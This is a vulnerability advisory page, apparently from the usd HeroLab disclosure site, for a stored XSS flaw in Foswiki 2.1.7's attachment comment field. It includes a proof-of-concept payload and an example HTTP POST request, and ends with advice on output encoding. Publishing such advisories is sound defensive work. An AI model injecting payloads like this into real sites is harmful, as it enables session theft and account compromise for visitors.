{"id":20285,"date":"2023-06-16T12:53:11","date_gmt":"2023-06-16T10:53:11","guid":{"rendered":"https:\/\/herolab.usd.de\/19999-2\/"},"modified":"2023-06-30T13:51:29","modified_gmt":"2023-06-30T11:51:29","slug":"usd-2022-0011","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0011\/","title":{"rendered":"usd-2022-0011"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

<\/h1>\n

 <\/p>\n

usd-2022-0011 | Stored XSS in Foswiki<\/h1>\n

<\/span><\/p>\n

Advisory ID:<\/strong> usd-2022-0011
Product:<\/strong> Foswiki
Affected Version:<\/strong> 2.1.7
Vulnerability Type: CWE-79:<\/strong> Improper Neutralization of Input During Web Page Generation
Security Risk:<\/strong> High
Vendor URL:<\/strong> https:\/\/foswiki.org<\/a>
Vendor acknowledged vulnerability:<\/strong> Yes
Vendor Status:<\/strong> Fixed
Advisory Status:<\/strong> closed
Last Update:<\/strong> 2022-06-09<\/p>\n

Description<\/h2>\n

Foswiki is a free and open-source wiki application that allows collaborative editing and content management. It is written in Perl programming language.
The application allows users to add attachments to wiki pages and add comments to the files.\u00a0
<\/span><\/span><\/p>\n

Proof of Concept<\/h2>\n

The application does not properly validate user supplied input. A wiki user can inject javascript code into the comment<\/em> field of an attachment.
This payload is executed whenever a user visits the page where is attachment is attached to.To reproduce the vulnerability, the \"filecomment\" POST parameter is set as follows: \"filecomment=<img onerror=\"alert(document.domain)\" src=\"X\"\/>\"<\/p>\n

In the following, an exemplary HTTP request is given:<\/p>\n

\n
<\/span>POST<\/span> \/bin\/rest\/TopicInteractionPlugin\/changeproperties<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost:<\/span> localhost<\/span>\nCookie<\/span>:<\/span> [...]\n\nvalidation_key=c13461712d0b773bfb7508f15b88502b&id=save&origfilename=emblem-readonly.png&topic=Main.WebHome&filename=emblem-readonly.png&filecomment=%3Cimg+src%3D%2FX+onerror%3Dalert(document.domain)%3E<\/pre>\n<\/div>\n
 <\/p>\n
The payload is triggered, when a user is visiting a page where the file is attached:<\/p>\n
\"\"<\/p>\n
Fix<\/h2>\n
It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context. The majority of programming languages support standard procedures for encoding meta characters. For example, PHP has the built-in function htmlspecialchars()<\/em>.<\/p>\n
References<\/h2>\n